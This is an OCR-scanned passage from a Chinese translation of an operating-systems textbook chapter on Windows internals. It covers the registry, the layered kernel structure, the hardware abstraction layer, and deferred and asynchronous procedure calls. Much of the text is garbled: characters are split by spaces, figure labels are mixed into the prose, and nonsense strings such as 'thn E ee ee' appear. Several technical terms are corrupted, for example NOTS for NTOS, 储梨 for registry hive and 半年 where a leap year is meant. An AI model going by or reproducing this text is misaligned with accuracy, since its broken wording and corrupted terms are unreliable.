SOFTWARE HKLM\SOFTWARE 


HKLM\COMPONENTS 


图 11-9 Windows 中 的 注册 表 储 梨 。HKLM 是 HKEY_LOCAL_MACHINE 的 缩写 


在 引入 注册 表 之 前 ，Windows 的 配置 信息 保存 在 大 量 的 .ini 文 件 里 ， 分 散在 硬盘 的 各 个 地 方 。 注 册 
表 则 把 这 些 文件 集中 存储 ， 使 得 这 些 文件 可 以 在 系统 启动 的 过 程 中 引用 。 这 对 Windows 热 插 拔 功能 是 很 
重要 的 。 但 是 ， 随 着 Windows 的 发 展 ， 注 册 表 已 经 变 得 无 序 。 有 些 关 于 配置 的 信息 的 协议 定义 得 很 差 ， 
而 且 很 多 应 用 程序 采取 了 特殊 的 方法 。 许 多 用 户 、 应 用 程序 以 及 所 有 驱动 程序 在 运行 时 具有 私有 权限 ， 
而 且 经 常 直接 更 改 注册 表 的 系统 参数 一 一 有 时 候 会 妨碍 其 他 程序 导致 系统 不 稳定 。 

注册 表 是 位 于 数据 库 和 文件 系统 之 间 的 一 个 交叉 点 ， 但 是 和 每 一 个 都 不 像 。 有 整 本 描写 注册 表 的 书 
(Born, 1998; Hipson, 2000; Ivens 1998)。 有 很 多 公司 开发 了 特殊 的 软件 去 管理 复杂 的 注册 表 。 

regedit 能 够 以 图 形 窗口 的 方式 来 浏览 注册 表 ， 这 个 工具 允许 你 查看 其 中 的 文件 夹 ( 称 作 键 ) 和 数据 
项 ( 称 作 值 )。 微 软 的 新 PowerShell 脚 本 语言 对 于 遍历 注册 表 的 键 和 值 是 非常 有 用 的 ， 它 把 这 些 键 和 值 
以 类 似 目 录 的 方式 来 看 待 。Procmon 是 一 个 比较 有 趣 的 工具 ， 可 以 从 微软 工具 网 站 www.microsoft. com/ 
technet/sysinternals 中 找到 它 。 

Procmon 监 视 系 统 中 所 有 对 注册 表 的 访问 。 有 时 ， 一 些 程序 可 能 会 重复 访问 同一 个 键 达 数 万 次 之 多 。 

正如 名 字 所 显示 的 那样 ， 注 册 表 编辑 器 允许 用 户 对 注册 表 进 行 编辑 ， 但 是 一 旦 你 这 么 做 就 必须 非常 
小 心 。 它 很 容易 造成 系统 无 法 引导 或 损坏 应 用 软件 的 安装 ， 因 此 没有 一 些 专业 技巧 就 不 要 去 修改 它 。 微 
软 承 诺 会 在 以 后 发 布 时 清理 注册 表 ， 但 现在 它 仍 是 庞杂 的 一 堆 一 一 比 UNIX 保 留 的 配置 信息 复杂 得 多 。 


新 操作 系统 的 设计 者 (尤其 是 iOS 和 Android) 极力 
thn E 
ee ee 

问 注册 表 ， 包 括 创建 、 删 除 键 、 查 询 键 值 等 。 如 
图 11-10 所 示 。 
当 系统 关闭 时 ， 大 部 分 的 注册 表 信息 被 存储 在 


硬盘 储 集中 。 因 为 极其 严格 的 完整 性 要 求 使 得 需要 
纠正 系统 功能 ， 自 动 实现 备份 ， 将 元 数据 冲 写 入 硬 。。” 图 11-10 一 些 使 用 注册 表 的 Win32 API 调用 


启动 配置 数据 库 
本 地 用 户 账户 信息 
lass 的 账户 和 其 他 安全 信息 
新 用 户 的 默认 储 梨 

用 户 相关 的 储 梨 ， 保 存在 home 目 录 
COM 注 册 的 应 用 类 
sys. 组 件 的 清单 和 依赖 
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盘 以 防止 在 发 生 系统 崩溃 时 所 造成 的 损坏 。 注 册 表 损坏 需要 重新 安装 系统 上 的 所 有 软件 。 


11.3 系统 结构 

前 面 的 章节 从 用 户 态 下 程序 员 写 代码 的 角度 研究 了 Windows 系 统 。 现 在 我 们 将 观察 系统 是 如 何 组 织 
的 ， 不 同 的 部 件 承担 什么 工作 以 及 它们 彼此 间或 者 和 用 户 程序 间 是 如 何 配合 的 。 这 是 实现 底层 用 户 态 代 
码 的 程序 开发 人 员 所 能 看 见 的 操作 系统 部 分 ， 如 子 系统 和 本 地 服务 ， 以 及 提供 给 设备 驱动 程序 开发 者 的 
系统 视图 。 

尽管 有 很 多 关于 Windows 使 用 方面 的 书籍 ， 但 很 少 有 书 讲述 它 是 如 何 工作 的 。 不 过 ， 查 阅 
«Microsoft Windows Internals, 6th ed, Partl and 2》 (Russionvich 和 Solomon, 2004) 是 其 中 最 好 的 选 
择 之 一 。 
11.3.1 操作 系统 结构 

Windows 操 作 系统 包括 很 多 层 ， 如 图 11-4 所 示 。 在 以 下 章节 我 们 将 研究 操作 系统 中 工作 于 内 核 态 的 
最 低级 层次 。 其 中 心 就 是 NOTS 内 核 层 自身 ， 当 Windows 启 动 时 由 ntoskrnl.exe 加 载 。NTOS 包 括 两 层 ， 
executive (执行 体 ) 提供 大 部 分 的 服务 ， 另 一 个 较 小 的 层 称 为 内 核 (kernel), Hw SIM IE MEG PAVE BE 
和 同步 抽象 ， 同 时 也 执行 陷入 句柄 中 断 以 及 管理 CPU 的 其 他 方面 。 

将 NTOS 分 为 内 核 和 执行 体 体现 了 NT 的 VAX/VMS 根 源 。VMS 操 作 系 统 也 是 由 Cutler 团 队 设计 的 ， 可 
分 为 4 个 由 硬件 实施 的 层次 : 用 户 、 管 理 程序 、 执 行 体 和 内 核 ， 与 VAX 处 理 机 结构 提供 的 4 种 保护 模式 一 
致 。Intel CPU 也 支持 这 4 种 保护 环 ， 但 是 一 些 早期 的 NT 处 理 机 对 此 不 支持 ， 因 此 内 核 和 执行 体 表现 了 由 
软件 实施 的 抽象 ， 同 时 VMS 在 管理 者 模式 下 提供 的 功能 ， 如 假 脱 机 打印 ，NT 是 作为 用 户 态 服务 提供 的 。 

NT 的 内 核 态 层 如 图 11-11 所 示 。NTOS 的 内 核 层 在 执行 体 层 之 上 ， 因 为 它 实现 了 从 用 户 态 到 内 核 态 
转换 的 陷入 和 中 断 机 制 。 图 11-11 所 示 的 最 顶层 是 系统 库 ntdll.dll， 它 实际 工作 于 用 户 态 。 系 统 库 包 括 许 
多 为 编译 器 运行 提供 的 支持 功能 以 及 低级 库 ， 类 似 于 UNIX 中 的 libc。Ntdll.dll 也 包括 了 特殊 码 输 入 指针 
以 支持 内 核 初始 化 线程 、 分 发 异常 和 用 户 态 的 异步 过 程 调用 (Asynchronous Procedure Calls, APC) 等 。 
因为 系统 库 对 内 核 运行 是 必需 的 ， 所 以 每 个 由 NTOS 创 建 的 用 户 态 进程 都 具有 相同 固定 地 址 描绘 的 ntdll。 
当 NTOS 初 始 化 系统 时 ， 会 创建 一 个 局 部 目标 并 且 记 录 下 内 核 使 用 的 ntdll 输 入 指针 地 址 。 


用 户 态 系统 库 核 心 用 户 态 分 配 例 程 (ntdll.dll) 


内 核 态 NTOS 陷入 /异常 /中 断 分 配 
内 核 层 CPU 调度 和 同步 ， 线程 、ISR、DPC、APC 













硬件 CPU，MMU， 中 断 控制 器 ， 内 存 ， 物 理 设 备 ，BIOS 


图 11-11 Windows 内 核 态 组 织 结构 


在 NTOS 内 核 和 执行 体 层 之 下 是 称 为 硬件 抽象 层 (Hardware Abstraction Layer, HAL) 的 软件 ， 该 
软件 对 类 似 于 设备 寄存 器 存 取 和 DMA 操 作 之 类 的 底层 硬件 信息 进行 抽象 ， 同 时 还 就 BIOS 固 件 是 如 何 表 
述 配置 信息 和 处 理 CPU 芯 片上 的 不 同 〈 如 各 种 中 断 控 制 器 ) 进行 抽象 。BIOS 可 以 从 很 多 公司 获得 ， 并 
且 被 集成 为 计算 机 主板 上 的 永久 内 存 。 

最 低级 的 软件 层 就 是 hypervisor ， 在 Windows 中 又 被 称 为 Hyper-V。hypervisor 在 Windows 中 是 一 个 
可 选 的 功能 (未 显示 在 图 11-13 上 ) 。 在 许多 版 本 的 Windows (包括 专业 版 的 桌面 客户 端 ) 中 都 能 看 到 它 
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的 身影 。 它 的 主要 功能 是 拦截 许多 内 核 的 特权 操作 ， 并 且 以 一 种 允许 多 个 操作 系统 在 同一 时 刻 运 行 的 方 
式 进行 模拟 。 每 一 个 操作 系统 都 在 它 所 处 的 虚拟 机 中 运行 (在 Windows 中 称 为 隔 扇 (partition ) ) 。 
hypervisor 会 采用 硬件 架构 上 的 功能 来 保护 物理 内 存 ， 并 保持 不 同 隔 扇 之 间 的 相对 独立 性 。 每 一 个 运行 
在 hypervisor 上 的 操作 系统 ， 都 会 对 从 物理 处 理 器 抽象 出 来 的 虚拟 处 理 器 (virtual processor) 的 线程 及 
句柄 进行 执行 和 处 理 。 而 hypervisor 则 会 在 物理 处 理 器 上 对 虚拟 处 理 器 进行 调度 。 

运行 在 主 隔 扁 上 的 主 ( 根 ) 操作 系统 会 给 其 他 的 隔 记 提供 许多 服务 。 其 中 最 重要 的 服务 就 是 对 于 使 
用 共享 设备 〈 例 如 网 络 设备 和 图 形 界面 ) 的 隔 扇 进行 整合 。 主 操作 系统 必须 是 运行 着 Hyper-V 的 
Windows， 而 其 他 的 隔 扇 上 则 可 以 运行 Linux 等 操作 系统 。 这 些 操作 系统 必须 先 经 过 一 定 的 修改 以 与 
hypervisor 协 同 ， 否 则 效率 会 非常 差 。 

举例 来 说 ， 如 果 一 个 运行 在 非 主 隔 饥 上 的 操作 系统 (如 Linux) 采用 自 旋 锁 来 在 两 个 虚拟 处 理 器 之 
间 进 行 同步 ， 而 其 中 一 个 拿 着 自 旋 锁 的 处 理 器 被 hypervisor 调 度 下 了 物理 处 理 器 ， 那 么 另外 一 个 处 理 器 
所 需要 等 待 的 时 间 将 会 成 数量 级 的 增长 。 为 了 解决 这 个 问题 , 这些 操 作 系统 需要 改变 自 旋 锁 的 运作 方式 ， 
使 得 其 在 很 短 的 时 间 之 内 (被 hypervisor 调 度 之 前 ) 礼貌 地 释放 即将 被 调度 的 虚拟 处 理 器 上 的 自 旋 锁 ， 
以 使 得 另外 一 个 虚拟 处 理 器 之 后 可 以 被 执行 。 

内 核 态 下 另 一 个 主要 部 件 就 是 设备 驱动 器 。Windows 内 核 态 下 任何 非 NTOS 或 HAL 的 设备 都 会 用 到 
设备 驱动 器 ， 包 括 文件 系统 、 网 络 协议 栈 和 其 他 如 防 病毒 程序 、DRM 软 件 之 类 的 内 核 扩 展 ， 以 及 与 硬 
件 总 线 接口 的 管理 物理 设备 驱动 器 等 。 

WO 和 虚拟 内 存 部 件 协作 加 载 设 备 驱 动 程序 至 内 核 存 储 器 并 将 它们 连接 到 NTOS 和 HAL 层 。1/O 管 理 
器 提供 发 现 、 组 织 和 操作 设备 的 接口 ， 包 括 安排 加 载 适 当 的 设备 驱动 程序 等 。 大 多 数 管理 设备 和 驱动 器 
的 配置 信息 都 保留 在 注册 表 的 系统 储 巢 中 。I/O 管 理 器 的 即 插 即 用 下 层 部 件 保 留 硬 件 储 集 内 检测 出 的 硬 
件 信 息 ， 该 储 巢 是 保留 在 内 存 中 的 可 变 储 梨 而 非 存在 于 硬盘 中 ， 系 统 每 次 引导 都 会 重新 创建 。 

以 下 将 详细 介绍 操作 系统 的 不 同 部 件 。 

1. 硬件 抽象 层 

正如 之 前 发 布 的 基于 NT 的 Windows 系 统一 样 ，Windows 的 目标 之 一 是 使 得 操作 系统 在 不 同 的 硬件 平 
台 之 间 具 有 可 移植 性 。 理 想 情况 下 ， 如 果 需 要 在 一 种 新 型 计算 机 系统 中 运行 该 操作 系统 ， 仅 仅 需要 在 首 
次 运行 时 使 用 新 机 器 编译 器 重新 编译 操作 系统 即 可 。 但 实际 上 并 没有 那么 简单 。 操 作 系 统 各 层 有 大 量 部 
件 具 有 很 好 的 可 移植 性 (因为 它们 主要 处 理 支 持 编程 模式 的 内 部 数据 结构 和 抽象 ， 从 而 支持 特定 的 编 成 
模式 ) ， 其 他 层 就 必须 处 理 设备 寄存 器 、 中 断 、DMA 以 及 机 器 与 机 器 间 显 著 不 同 的 其 他 硬件 特征 。 

大 多 数 NTOS 内 核 源 代码 由 C 语 言 编 写 而 非 汇编 语言 (x86 中 仅 2% 是 汇编 语言 ， 比 x64 少 1% ) 。 然 而 ， 
所 有 这 些 C 语 言 代 码 都 不 能 简单 地 从 x86 系 统 中 移植 到 一 个 SPARC 系 统 ， 然 后 重新 编译 、 重 新 引导 ， 因 
为 与 不 同 指令 集 无 关 并 且 不 能 被 编译 器 隐藏 的 处 理 机 结构 及 其 硬件 实现 上 有 很 多 不 同 。 像 C 这 样 的 语言 
难以 抽象 硬件 数据 结构 和 参数 ， 如 页 表 输 入 格式 、 物 理 存储 页 大 小 和 字 长 等 。 所 有 这 些 以 及 大 量 的 特定 
硬件 的 优化 即使 不 用 汇编 语言 编写 ， 也 将 不 得 不 手工 处 理 。 

大 型 服务 器 的 内 存 如 何 组 织 或 者 何 种 硬件 同步 原 语 是 可 用 的 ， 与 此 相关 的 硬件 细节 对 系统 较 高 层 都 
有 比较 大 的 影响 。 例 如 ，NT 的 虚拟 内 存 管理 器 和 内 核 层 了 解 涉及 内 存 和 内 存 位 置 的 硬件 细节 。 在 整个 
系统 中 ，NT 使 用 的 是 比较 和 交换 同步 基 元 ， 对 于 没有 这 些 基 元 的 系统 是 很 难 移植 上 去 的 。 最 后 ， 系 统 
对 字 内 的 字 节 分 类 系统 存在 很 多 相关 性 。 在 所 有 NT 原来 移植 到 的 平台 上 ， 硬 件 是 设置 为 小 端 (little- 
endian) 模式 的 。 

除了 以 上 这 些 影响 便携 性 的 较 大 问题 外 ， 不 同 制造 商 的 不 同 主板 还 存在 大 量 的 小 问题 。CPU 版 本 的 
不 同 会 影响 同步 基 元 的 实现 方式 。 各 种 支持 芯片 组 也 会 在 硬件 中 断 的 优先 次 序 、LO 设 备 寄存 器 的 存 取 、 
DMA 转 换 管 理 、 定 时 器 和 实时 时 钟 控 制 、 多 处 理 器 同步 、BIOS 设 备 (如 ACPI) 的 工作 等 方面 产生 差异 。 
微软 尝试 通过 最 下 端的 HAL 层 隐藏 对 这 些 设备 类 型 的 依赖 。HAL 的 工作 就 是 对 这 些 硬件 进行 抽象 ， 隐 藏 
处 理 器 版 本 、 支 持 芯 片 集 和 其 他 配置 变更 等 具体 细节 。 这 些 HAL 抽 象 展现 为 NTOS 和 驱动 可 用 的 独立 于 
机 器 的 服务 。 

使 用 HAL 服 务 而 不 直接 写 硬件 地 址 ， 驱 动 器 和 内 核 在 与 新 处 理 器 通信 时 只 需要 较 小 改变 ， 而 且 在 多 数 
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情况 下 ， 尽 管 版 本 和 支持 芯片 集 不 同 但 只 要 有 相同 的 处 理 器 结构 ， 系 统 中 所 有 部 件 均 无 需 修改 就 可 运行 。 

HAL 对 诸如 键盘 、 鼠 标 、 硬 盘 等 特殊 的 IO 设备 或 内 存 管 理 单元 不 提供 抽象 或 服务 。 这 种 抽象 功能 
广泛 应 用 于 整个 内 核 态 的 各 部 件 ， 如 果 没 有 HAL， 通 信 时 即使 硬件 间 很 小 的 差异 也 会 造成 大 量 代 码 的 重 
大 修改 。HAL 自 身 的 通信 很 简单 ， 因 为 所 有 与 机 器 相关 的 代码 都 集中 在 一 个 地 方 ， 移 植 的 目标 就 很 容易 
确定 : 即 实现 所 有 的 HAL 服 务 。 很 多 版 本 中 ， 微 软 都 支持 HAL 扩 展 工具 包 ， 人 允许 系统 制造 者 生产 各 自 的 
HAL 从 而 使 得 其 他 内 核 部 件 在 新 系统 中 无 需 更 改 即 可 工作 ， 当 然 这 要 在 硬件 更 改 不 是 很 大 的 前 提 下 。 

通过 内 存 映射 10 与 /0 端口 的 对 比 可 以 更 好 地 了 解 硬件 抽象 层 是 如 何 工作 的 。 一 些 机 器 有 内 存 映 射 
IO， 而 有 的 机 器 有 IO 端口 。 驱 动 程序 是 如 何 编写 的 呢 ? 是 不 是 使 用 内 存 映射 IO? 无 需 强制 做 出 选择 ， 
只 需要 判断 哪 种 方式 使 驱动 程序 可 独立 于 机 器 运行 即 可 。 硬 件 抽象 层 为 驱动 程序 编写 者 分 别提 供 了 三 种 
读 、 写 设备 寄存 器 的 程序 : 

uc=READ_PORT_UCHAR(port); WRITE_PORT_UCHAR(port,uc); 

us=READ_PORT_USHORT(port); WRITE_PORT_ USHORT (port,us); 

ul=READ_PORT_ULONG(port); WRITE_PORT_ULONG(port,ul); 


这 些 程序 各 自在 指定 端口 读 、 写 无 符号 8、16、32 位 整数 ， 由 硬件 抽象 层 决定 是 否 需 要 内 存 映射 1JO。 这 
样 ， 驱 动 程序 可 以 在 设备 寄存 器 实现 方式 有 差异 的 机 器 间 使 用 而 不 需要 修改 。 

驱动 程序 会 因为 不 同 目的 而 频繁 存 取 特 定 的 IO 设备 。 在 硬件 层 ， 一 个 设备 在 确定 的 总 线 上 有 一 个 
或 多 个 地 址 。 因 为 现代 计算 机 通常 有 多 个 总 线 (ISA、PCI、PCI-X、USB 、1394 等 ) ， 这 就 可 能 造成 不 
同 总 线 上 的 多 个 设备 有 相同 的 地 址 ， 因 此 需要 一 些 方法 来 区 别 它们 。HAL 把 与 总 线 相 关 的 设备 地 址 映射 
为 系统 逻辑 地 址 并 以 此 来 区 分 设备 。 这 样 ， 驱 动 程序 就 无 需 知道 何 种 设备 与 何 种 总 线 相 关联 。 这 种 机 制 
也 保护 了 较 高 层 避 免 进 行 总 线 结构 和 地 址 规约 的 交替 。 

中 断 也 存在 相似 的 问题 一 一 总 线 依赖 性 。HAL 同样 提供 服务 在 系统 范围 内 命名 中 断 ， 并 且 人 允许 驱 
动 程序 将 中 断 服务 程序 附 在 中 断 内 而 无 需 知 道中 断 向 量 与 总 线 的 关系 。 中 断 请 求 管理 也 受 HAL 控 制 。 

HAL 提 供 的 另 一 个 服务 是 在 设备 无 关 方 式 下 建立 和 管理 DMA 转 换 ， 对 系统 范围 和 专用 LI/O 卡 的 
DMA 引 擎 进行 控制 。 设 备 由 其 逻辑 地 址 指示 。HAL 实 现 软件 的 散布 /聚合 〈 从 不 相 邻 的 物理 内 存 块 的 地 
方 写 或 者 读 )。 

HAL 也 是 以 用 一 种 可 移植 的 方式 来 管理 时 钟 和 定时 器 的 。 定 时 器 是 以 100 纳 秒 为 单位 从 1601 年 1 月 1 
日 开始 计数 的 ， 因 为 这 是 1601 年 的 第 一 天 ， 简 化 了 头 年 的 计算 。 (一 个 简单 测试 : 1800 年 是 半年 吗 ? 答 
案 : 不 是 。) 定时 器 服务 和 驱动 程序 中 的 时 钟 运行 的 频率 是 解 耦合 的 。 

有 时 需要 在 底层 实现 内 核 部 件 的 同步 ， 尤 其 是 为 了 防止 多 处 理 机 系统 中 的 竞争 环境 。HAL 提 供 基 元 管 
理 同 步 ， 如 旋转 锁 ， 此 时 一 个 CPU 等 待 其 他 CPU 释放 资源 ， 比 较 特 殊 的 情况 是 资源 被 几 个 机 器 指令 占有 。 

最 终 ， 系 统 引 导 后 ，HAL 和 BIOS 通 信 ， 检 查 系 统 配置 信息 以 查 明 系统 所 包含 的 总 线 、1/O 设 备 及 其 
配置 情况 ， 同 时 该 信息 被 添加 进 注 册 表 。HAL 工 作 情况 摘要 如 图 11-12 所 示 。 
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硬件 抽象 层 
图 11-12 一 些 HAL 管 理 相关 的 硬件 功能 


2. 内 核 层 
在 硬件 抽象 层 之 上 是 NTOS， 包括 两 层 : 内 核 和 执行 体 。 内核 ” 在 Windows 中 是 一 个 易 混 消 的 术语 。 
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它 可 以 指 运行 在 处 理 机 内 核 态 下 的 所 有 代码 ， 也 可 以 指 包含 了 Windows 操 作 系统 内 核 NTOS 的 
ntoskrnl.exe 文 件 ， 还 可 以 指 NTOS 里 的 内 核 层 ， 在 本 章 中 我 们 使 用 这 个 概念 。 此 外 ,“ 内 核 ” 甚 至 用 来 命 
名 用 户 态 下 提供 本 地 系统 调用 的 封装 器 的 Win32 库 : kernel32.dll。 

Windows 操 作 系统 的 内 核 层 (如 图 11-11 所 示 ， 执 行 体 之 上 ) 提供 了 一 套 管理 CPU 的 抽象 。 最 核心 
的 抽象 是 线程 ， 但 是 内 核 也 实现 了 异常 处 理 、 陷 阱 以 及 各 种 中 断 。 支 持 线程 的 数据 结构 的 创建 和 终止 是 
在 执行 体 实现 的 。 内 核 层 负责 调度 和 同步 线程 。 在 一 个 单独 的 层 内 支持 线程 ， 允 许 执 行 体 在 用 户 态 下 ， 
可 以 通过 使 用 用 来 编写 并 行 代码 且 相 同 优先 级 的 多 线程 模型 来 执行 ， 但 同步 原 语 的 执行 更 专业 。 

内 核 中 的 线程 调度 程序 负责 决定 哪些 线程 在 系统 的 每 一 个 CPU 上 执行 。 线 程 会 一 直 执 行 ， 直 到 产生 
了 一 个 定时 器 中 断 , 或 者 是 当 线程 需要 等 待 一 些 事件 发 生 ， 比 如 等 待 一 个 IO 读 写 完成 或 是 一 个 锁 被 释放 ， 
或 者 是 更 高 优先 级 的 线程 等 待 运行 而 需要 CPU, 这 时 正在 执行 的 线程 会 切换 到 另 一 个 线程 (时 间 片 到 期 ) 。 
当 一 个 线程 向 另 一 个 线程 转换 时 ， 调 度 程序 会 在 CPU 上 运行 ， 并 确保 寄存 器 及 其 他 硬件 状态 已 保存 。 然 
后 ， 调 度 程序 会 选择 另 一 个 线程 在 CPU 上 运行 ， 并 且 恢 复 之 前 所 保存 的 最 后 一 个 线程 的 运行 状态 。 

如 果 下 一 个 运行 的 线程 是 在 一 个 不 同 的 地 址 空间 (例如 进程 )， 调 度 程 序 也 必须 改变 地 址 空间 。 详 
细 的 调度 算法 我 们 将 在 本 章 内 谈 到 进程 和 线程 时 讨论 。 

除了 提供 更 高 级 别 的 硬件 抽象 和 线程 转换 机 制 ， 内 核 层 还 有 另外 一 项 关键 功能 : 提供 对 下 面 两 种 同 
步 机 制 低级 别 的 支持 : control 对 象 和 dispatcher 对 象 。Control 对 象 是 内 核 层 向 执行 体 提 供 抽象 的 CPU 管 
理 的 一 种 数据 结构 。 它 们 由 执行 体 来 分 配 ， 但 由 内 核 层 提供 的 例 程 来 操作 。Dispatcher 对 象 是 一 种 普通 
执行 对 象 ， 使 用 一 种 公用 的 数据 结构 来 同步 。 

3. 延迟 过 程 调用 

Control 对 象 包括 线程 、 中 断 、 定 时 器 、 同 步 、 调 试 等 一 些 原 语 对 象 ， 和 两 个 用 来 实现 DPC 和 APC 的 
特殊 对 象 。DPC (延迟 过 程 调用 ) 对 象 是 用 来 减少 执行 ISR (中 断 服务 例 程 ) 所 需要 的 时 间 ， 以 响应 从 
特定 设备 发 来 的 中 断 。 在 ISR 上 限定 耗费 的 时 间 可 以 减少 中 断 丢 失 的 概率 。 

系统 硬件 为 中 断 指定 了 硬件 优先 级 。 在 CPU 进行 工作 时 也 伴随 着 一 个 优先 级 。CPU 只 响应 比 当前 更 
高 优先 级 的 中 断 。 通 常 的 优先 级 是 0， 包 括 所 有 用 户 态 下 的 优先 级 。 设 备 中 断 发 生 在 优先 级 3 或 更 高 ， 让 
一 个 设备 中 断 的 ISR 以 同一 优先 级 的 中 断 来 执行 是 防止 其 他 不 重要 的 中 断 影响 它 正在 进行 的 重要 中 断 。 

如 果 ISR 执 行 得 太 长 ， 提 供给 低 优 先 级 中 断 的 服务 将 被 推迟 ， 可 能 造成 数据 丢失 或 减缓 系统 的 1/O 知 
吐 量 。 多 ISR 可 以 在 任何 同一 时 刻 处 理 ， 每 一 个 后 续 的 ISR 是 由 在 其 更 高 的 优先 级 产生 了 中 断 。 

为 了 减少 处 理 ISR 所 花费 的 时 间 ， 只 有 关键 的 操作 才 执 行 ， 如 IO 操作 结果 的 捕捉 和 设备 重 置 。 直 到 
CPU 的 优先 级 降低 ， 且 没有 其 他 中 断 服 务 阻塞 ， 才 会 进行 下 一 步 的 中 断 处 理 。DPC 对 象 用 来 表示 将 要 做 
的 工作 ，ISR 调 用 内 核 层 排列 DPC 到 特定 处 理 器 上 的 DPC 队列 。 如 果 DPC 在 队列 的 第 一 个 位 置 ， 内 核 会 
登记 一 个 特殊 的 硬件 请 求 让 CPU 在 优先 级 2 产生 中 断 (NT 下 称 为 DISPATCH 级 别 ) 。 当 最 后 一 个 执行 的 
ISR 完 成 后 ， 处 理 器 的 中 断 级 别 将 回落 到 低 于 2， 这 将 解 开 DPC 处 理 中 断 。 服 务 于 DPC 中 断 的 ISR 将 会 
理 内 核 排列 好 的 每 一 个 DPC 对 象 。 

利用 软 中 断 延 迟 中 断 处 理 是 一 种 行 之 有 效 的 减少 ISR 延 迟 时间 的 方法 。UNIX 和 其 他 系统 在 20 世 纪 
70 年 代 开始 使 用 延迟 处 理 ， 以 处 理 缓慢 的 硬件 和 有 限 的 缓冲 串 行 连接 终端 。ISR 人 负责 处 理 从 硬件 提取 字 
符 并 排列 它们 。 在 所 有 高 级 别 的 中 断 处 理 完 成 以 后 ， 软 中 断 将 执行 一 个 低 优 先 级 的 ISR 做 字符 处 理 ， 比 
如 通过 向 终端 发 送 控制 字符 来 执行 一 个 退 格 键 ， 以 抹 去 最 后 一 个 显示 字符 并 向 后 移动 光标 。 

在 当前 的 Windows 操 作 系 统 下 ， 类 似 的 例子 是 键盘 设备 。 当 一 个 键 被 敲 击 以 后 ， 键 盘 ISR 从 寄存 器 
中 读 取 键 值 ， 然 后 重新 使 键盘 中 断 ， 但 并 不 对 下 一 步 的 按键 进行 及 时 处 理 。 相 反 ， 它 使 用 一 个 DPC 去 排 
队 处 理 键 值 ， 直 到 所 有 优先 的 设备 中 断 已 处 理 完成 。 

因为 DPC 在 级 别 2 上 运行 ， 它 们 并 不 干涉 ISR 设 备 的 执行 ， 在 所 有 排队 中 的 DPC 执 行 完 成 并 且 CPU 的 
优先 级 低 于 2 之 前 ， 它 们 会 阻止 任何 线程 的 运行 。 设 备 驱 动 和 系统 本 身 必须 注意 不 要 运行 ISR 或 DPC 太 长 
时 间 。 因 为 在 运行 它们 的 时 候 不 能 运行 线程 ，ISR 或 DPC 的 运行 会 使 系统 出 现 延 迟 ， 并 且 可 能 在 播放 音 
乐 时 产生 不 连续 ， 因 为 拖延 了 线程 对 声卡 的 音乐 缓冲 区 的 写 操作 。DPC 另 一 个 通常 的 用 处 是 运行 程序 以 
响应 定时 器 中 断 。 为 了 避免 线程 阻塞 ， 要 延长 运行 时 间 的 定时 器 事件 需要 向 内 核 维持 后 台 活 动 的 线程 工 
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作 池 做 排队 请 求 。 这 些 线程 有 调度 优先 级 12、13 或 15。 我 们 会 在 线程 调度 部 分 看 到 ， 这 些 优先 级 意味 着 
工作 项 目 将 会 先 于 大 多 数 线程 执行 ， 但 是 不 会 打 断 实时 线程 。 

4. 异步 过 程 调用 

另 一 个 特殊 的 内 核 控 制 对 象 是 APC (异步 过 程 调用 ) 对 象 。APC 与 DPC 的 相同 之 处 是 它们 都 是 延迟 
处 理 系统 例 行 程序 ， 不 同 之 处 在 于 DPC 是 在 特定 的 CPU 上 下 文中 执行 ， 而 APC 是 在 一 个 特定 的 线程 上 下 
文中 执行 。 当 处 理 一 个 键盘 敲 击 操作 时 ，DPC 在 哪 一 个 上 下 文中 运行 是 没有 关系 的 ， 因 为 一 个 DPC 仅 仅 
是 处 理 中 断 的 另 一 部 分 ， 中 断 只 需要 管理 物理 设备 和 执行 独立 线程 操作 ， 例 如 在 内 核 空间 的 一 个 缓冲 区 
记录 数据 。 

当 原 始 中 断 发 生 时 ，DPC 例 程 运行 在 任何 线程 的 上 下 文中 。 它 利用 IO 系统 来 报告 IO 操作 已 经 完成 ， 
IO 系统 安排 一 个 APC 在 线程 的 上 下 文中 运行 从 而 做 出 原始 的 IO 请 求 ， 在 这 里 它 可 以 访问 处 理 输入 的 线 
程 的 用 户 态 地址 空间 。 

在 下 一 个 合适 的 时 间 ， 内 核 层 会 将 APC 移 交 给 线程 而 且 调 度 线程 运行 。 一 个 APC 被 设计 成 看 上 去 像 
一 个 非 预期 的 程序 调用 ， 有 些 类 似 于 UNIX 中 的 信号 处 理 程 序 。 不 过 在 内 核 态 下 ， 内 核 态 的 APC 为 了 完 
成 /0 操作 ， 而 在 完成 初始 化 LO 操作 的 线程 的 上 下 文中 执行 。 这 使 APC 既 可 以 访问 内 核 态 的 缓冲 区 ， 又 
可 以 访问 用 户 态 下 ， 属 于 包含 线程 的 进程 的 地 址 空间 。 一 个 APC 在 什么 时 候 被 移交 ， 取 决 于 线程 已 经 在 
做 什么 ， 以 及 系统 的 类 型 是 什么 。 在 一 个 多 处 理 器 系统 中 ， 甚 至 是 在 DPC 完成 运行 之 前 ， 接 收 APC 的 线 
程 才 可 以 开始 执行 。 

用 户 态 下 的 APC 也 可 以 用 来 把 用 户 态 的 IO 操作 已 经 完成 的 信息 ， 通 知 给 初始 化 IO 操作 的 线程 。 但 
只 有 当 内 核 中 的 目标 线程 被 阻塞 和 被 标示 为 准备 接收 APC 时 ， 用 户 态 下 的 APC 才 可 调用 用 户 态 下 的 应 用 
程序 。 但 随 着 用 户 态 堆 栈 和 寄存 器 的 修改 ， 为 了 执行 在 ntdll.dll 系 统 库 中 的 APC 调 度 算法 ， 内 核 将 等 待 中 
的 线程 中 断 , 并 返回 到 用 户 态 。APC 调 度 算 法 调用 和 IO 操作 相关 的 用 户 态 应 用 程序 。 除 了 一 些 IO 完成 后 ， 
作为 一 种 执行 代码 方法 的 用 户 态 下 的 APC 外 ，Win32 API 中 的 QueueUserAPC 人 允许 将 APC 用 于 任意 目的 。 

执行 体 也 使 用 除了 LO 完成 之 外 的 一 些 APC 操 作 。 由 于 APC 机 制 精心 设计 为 只 有 当 它 是 安全 的 时 候 
才 提 供 APC， 它 可 以 用 来 安全 地 终止 线程 。 如 果 这 不 是 一 个 终止 线程 的 好 时 机 ， 该 线程 将 宣布 它 已 进入 
一 个 临界 区 ， 并 延期 交付 APC 直 至 得 到 许可 。 在 获得 锁 或 其 他 资源 之 前 ， 内 核 线程 会 标记 自己 已 进入 临 
界 区 并 延迟 APC， 这 时 ， 它 们 不 能 被 终止 ， 并 仍然 持 有 资源 。 

5. 调度 对 象 

另 一 种 同步 对 象 是 调度 对 象 。 这 是 常用 的 内 核 态 对 象 (一 种 用 户 可 以 通过 句柄 处 理 的 类 型 ) ， 它 包 
